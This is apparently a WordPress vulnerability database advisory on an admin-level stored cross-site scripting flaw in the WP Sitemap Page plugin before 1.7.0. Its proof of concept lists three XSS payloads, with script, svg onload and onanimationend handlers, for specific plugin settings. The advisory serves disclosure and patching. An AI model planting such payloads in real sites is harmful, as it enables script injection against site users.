WordPress Plugin Vulnerabilities

WP Sitemap Page < 1.7.0 - Admin+ Stored Cross Site Scripting

Description

The plugin does not properly sanitise and escape some of its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

Proof of Concept

Put the following payloads in the mentioned settings of the plugin:
- How to display the posts (backend XSS, v < 1.6.5): </textarea><svg/onload=confirm('XSS')>
- How to display the posts (frontend XSS, v < 1.6.6): <a style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(/XSS/)" href="{permalink}">{title}</a>
- Exclude pages (backend XSS, v < 1.7.0): "><script>alert(/XSS/)</script>

Affects Plugins

Plugin icon
wp-sitemap-page
Fixed in 1.7.0

References

CVE
CVE-2021-24715
Exploitdb
50268

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
3.5 (low)

Miscellaneous

Original Researcher
Nikhil Kapoor From Esecforte
Submitter
Nikhil Kapoor From Esecforte
Verified
Yes
WPVDB ID
da66d54e-dda8-4aa8-8d27-b8b87100bb21

Timeline

Publicly Published
2021-09-07 (about 2 years ago)
Added
2021-10-05 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other

Published
Title
Published
2023-01-11
Title
EAN for WooCommerce < 4.4.3 - Contributor+ Stored XSS
Published
2024-03-25
Title
Portfolio Gallery – Image Gallery Plugin < 1.5.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Published
2023-10-27
Title
WP Post Popup <= 3.7.3 - Admin+ Stored XSS
Published
2020-05-25
Title
Add-on SweetAlert Contact Form 7 < 1.0.8 - Authenticated Stored Cross-Site Scripting (XSS)
Published
2024-01-03
Title
TJ Shortcodes <= 0.1.3 - Contributor+ Stored XSS via Shortcodes